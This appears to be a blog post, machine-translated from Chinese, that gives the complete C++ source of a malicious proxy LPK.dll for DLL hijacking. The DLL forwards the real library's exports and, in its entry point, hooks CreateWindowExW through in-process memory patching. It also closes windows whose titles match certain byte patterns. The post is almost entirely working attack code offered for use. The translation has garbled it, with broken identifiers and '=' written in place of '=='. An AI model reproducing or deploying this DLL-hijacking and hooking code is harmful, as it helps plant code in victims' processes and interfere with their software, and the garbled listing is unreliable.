DLL hijacking LPK. dll


// The usp10 version was written up last time; this time the LPK code is pasted.
// The code below is the contents of LPK.cpp; the header file is the same as the one used for the previous usp10 build.

// LPK.cpp: defines the entry point for the DLL application.
//

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Header file
# Include "stdafx. H"
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
# Pragma comment (linker, "/export: lpkinitialize = _ aheadlib_lpkinitialize, @ 1 ")
# Pragma comment (linker, "/export: lpktabbedtextout = _ aheadlib_lpktabbedtextout, @ 2 ")
# Pragma comment (linker, "/export: lpkdllinitialize = _ aheadlib_lpkdllinitialize, @ 3 ")
# Pragma comment (linker, "/export: lpkdrawtextex = _ aheadlib_lpkdrawtextex, @ 4 ")
// # Pragma comment (linker, "/export: lpkeditcontrol = _ aheadlib_lpkeditcontrol, @ 5 ")
# Pragma comment (linker, "/export: lpkexttextout = _ aheadlib_lpkexttextout, @ 6 ")
# Pragma comment (linker, "/export: lpkgetcharacterplacement = _ aheadlib_lpkgetcharacterplacement, @ 7 ")
# Pragma comment (linker, "/export: lpkgettextextentexpoint = _ aheadlib_lpkgettextextentexpoint, @ 8 ")
# Pragma comment (linker, "/export: lpkpsmtextout = _ aheadlib_lpkpsmtextout, @ 9 ")
# Pragma comment (linker, "/export: lpkusegdiwidthcache = _ aheadlib_lpkusegdiwidthcache, @ 10 ")
# Pragma comment (linker, "/export: ftswordbreak = _ aheadlib_ftswordbreak, @ 11 ")
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Macro definition
# Define externc extern "C"
# Define naked _ declspec (naked)
# Define export _ declspec (dllexport)

# Define alcpp export naked
# Define alstd externc export naked void _ stdcall
# Define alcfast externc export naked void _ fastcall
# Define alcdecl externc naked void _ cdecl
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
Hinstance g_hinstdll;
Farproc fpcreatewindow;
Hmodule;
Byte oldcreatewindowcode [5], newcreatewindowcode [5]/*, reljmpcode [10] */;
DWORD dwidold, dwidnew;
Bool bhook = false;

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Aheadlib namespace
Namespace aheadlib
{
Hmodule m_hmodule = NULL; // original module handle
// Load the original Module
Inline bool winapi load ()
{
Tchar tzpath [max_path];
Tchar tztemp [max_path * 2];
Getsystemdirectory (tzpath, max_path );
Lstrcat (tzpath, text ("\ LPK. dll "));
M_hmodule = loadlibrary (tzpath );
If (m_hmodule = NULL)
{
Wsprintf (tztemp, text ("% s cannot be loaded, and the program cannot run normally. "), Tzpath );
MessageBox (null, tztemp, text ("aheadlib"), mb_iconstop );
}
Return (m_hmodule! = NULL );
}
// Release the original Module
Inline void winapi free ()
{
If (m_hmodule)
{
Freelibrary (m_hmodule );
}
}
// Obtain the original function address
Farproc winapi getaddress (pcstr pszprocname)
{
Farproc fpaddress;
Char szprocname [16];
Tchar tztemp [max_path];
Fpaddress = getprocaddress (m_hmodule, pszprocname );
If (fpaddress = NULL)
{
If (hiword (pszprocname) = 0)
{
Wsprintf (szprocname, "% d", pszprocname );
Pszprocname = szprocname;
}
Wsprintf (tztemp, text ("the function % hs cannot be found, and the program cannot run normally. "), Pszprocname );
MessageBox (null, tztemp, text ("aheadlib"), mb_iconstop );
Exitprocess (-2 );
}
Return fpaddress;
}
}
Using namespace aheadlib;
//////////////////////////////////////// //////////////////////////////////////// ////////////////

Void hookon ();
Void hookoff ();
Void winapiv Init (lpvoid pparam );
Hwnd winapi mycreatewindow (DWORD dwexstyle, maid, lpwstr lpwindowname, DWORD dwstyle,
Int X, int y, int nwidth, int nheight, hwnd hwndparent, hmenu, hinstance, lpvoid lpparam );
Void winapiv threadproc (lpvoid pparam );
Void winapiv threadproc2 (lpvoid pparam );

Inline hwnd winapi relcreateappswexw (DWORD dwexstyle, lpcwstr lpclassname, lpcwstr lpwindowname, DWORD dwstyle,
Int X, int y, int nwidth, int nheight, hwnd hwndparent, hmenu, hinstance, lpvoid lpparam)
{
Hookoff ();
Hwnd ret = createdomainwexw (
Dwexstyle, lpclassname, lpwindowname,
Dwstyle, X, Y, nwidth, nheight,
Hwndparent, hmenu, hinstance, lpparam );
Hookon ();
Return ret;
}
Void winapiv Init (lpvoid pparam)
{
Sleep (100 );
Hmodule = loadlibrary ("user32.dll ");
Fpcreatewindow = getprocaddress (hmodule, "createmediawexw ");
If (fpcreatewindow = NULL)
Return;
_ ASM
{
Pushad
Lea EDI, oldcreatewindowcode
MoV ESI, fpcreatewindow
ClD
Movsd
Movsb
Popad
}
Newcreatewindowcode [0] = 0xe9; // command for the relative address of JMP mycreatewindow
_ ASM
{
Lea eax, mycreatewindow
MoV EBX, fpcreatewindow
Sub eax, EBX
Sub eax, 5
MoV dword ptr [newcreatewindowcode + 1], eax
}
Dwidnew = getcurrentprocessid (); // obtain the ID of the process
Dwidold = dwidnew;
_ Beginthread (threadproc2, null, (lpvoid) (INT) (3*60 ));
}
//---------------------------------------------------------------------------
Hwnd winapi mycreatewindow (DWORD dwexstyle,
Maid,
Lpwstr lpwindowname,
DWORD dwstyle,
Int X,
Int y,
Int nwidth,
Int nheight,
Hwnd hwndparent,
Hmenu,
Hinstance,
Lpvoid lpparam)
{
Hwnd ret = relcreatecontactwexw (
Dwexstyle, lpclassname, lpwindowname,
Dwstyle, X, Y, nwidth, nheight,
Hwndparent, hmenu, hinstance, lpparam );
If (dwexstyle = 0)
Return ret;
If (dwexstyle! = 768)
Return ret;
Return ret;
}
Void winapiv threadproc (lpvoid pparam)
{
Char buffer [100];
Memset (buffer, 0,100 );
If (iswindow (hwnd) pparam ))
Getwindowtext (hwnd) pparam, buffer, 100 );
Else
Return;
If (buffer [0] = 81 & buffer [1] = 81 & buffer [2] =-51 & buffer [3] =-8 && buffer [4] =-80 & buffer [5] =-55)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
Else if (buffer [0] =-67 & buffer [1] =-15 & buffer [2] =-56 & buffer [3] =- 43 & buffer [4] =-46 & buffer [5] =-86)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
Else if (buffer [0] =-54 & buffer [1] =-42 & buffer [2] =-69 & buffer [3] =- 6 & buffer [4] =-55 & buffer [5] =-6)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
}
Void winapiv threadproc2 (lpvoid pparam)
{
Sleep (1000 );
Hookon ();
For (INT I = 0; I <(INT) pparam; I ++)
Sleep (1000 );
Hookoff ();
}

Void hookon ()
{
Handle hproc;
Dwidold = dwidnew;
Hproc = OpenProcess (process_all_access, 0, dwidold); // obtain the Process Handle
Virtualprotectex (hproc, fpcreatewindow, 5, page_readwrite, & dwidold); // modify the attribute of the first five bytes of createwindow in the process to be writable.
Writeprocessmemory (hproc, fpcreatewindow, newcreatewindowcode, 5, 0); // change the first five bytes of createwindow in the process to JMP to mycreatewindow.
Virtualprotectex (hproc, fpcreatewindow, 5, dwidold, & dwidold); // modify the attribute of the first five bytes of createwindow in the process to the original attribute.
Bhook = true;
}
//---------------------------------------------------------------------------
// Change the JMP mycreatewindow code in the process to JMP createwindow
Void hookoff ()
{
Handle hproc;
Dwidold = dwidnew;
Hproc = OpenProcess (process_all_access, 0, dwidold );
Virtualprotectex (hproc, fpcreatewindow, 5, page_readwrite, & dwidold );
Writeprocessmemory (hproc, fpcreatewindow, oldcreatewindowcode, 5, 0 );
Virtualprotectex (hproc, fpcreatewindow, 5, dwidold, & dwidold );
Bhook = false;
}

// The lpkeditcontrol exports an array instead of a single function (by backer)
Externc void _ cdecl aheadlib_lpkeditcontrol (void );
Externc _ declspec (dllexport) void (* lpkeditcontrol [14]) () = {aheadlib_lpkeditcontrol };
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Entry function
Bool winapi dllmain (hmodule, DWORD dwreason, pvoid pvreserved)
{
If (dwreason = dll_process_attach)
{
Disablethreadlibrarycils (hmodule );
Load ();
// The lpkeditcontrol array has 14 members and must be copied.
Memcpy (lpvoid) (lpkeditcontrol + 1), (lpvoid) (int *) getaddress ("lpkeditcontrol") + 1), 52 );
_ Beginthread (init, null, null );
}
Else if (dwreason = dll_process_detach)
{
Free ();
}
Return true;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkinitialize (void)
{
Getaddress ("lpkinitialize ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpktabbedtextout (void)
{
Getaddress ("lpktabbedtextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkdllinitialize (void)
{
Getaddress ("lpkdllinitialize ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkdrawtextex (void)
{
Getaddress ("lpkdrawtextex ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkeditcontrol (void)
{
Getaddress ("lpkeditcontrol ");
_ Asm jmp dword ptr [eax];
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkexttextout (void)
{
Getaddress ("lpkexttextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkgetcharacterplacement (void)
{
Getaddress ("lpkgetcharacterplacement ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkgettextextentexpoint (void)
{
Getaddress ("lpkgettextextentexpoint ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkpsmtextout (void)
{
Getaddress ("lpkpsmtextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkusegdiwidthcache (void)
{
Getaddress ("lpkusegdiwidthcache ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_ftswordbreak (void)
{
Getaddress ("ftswordbreak ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
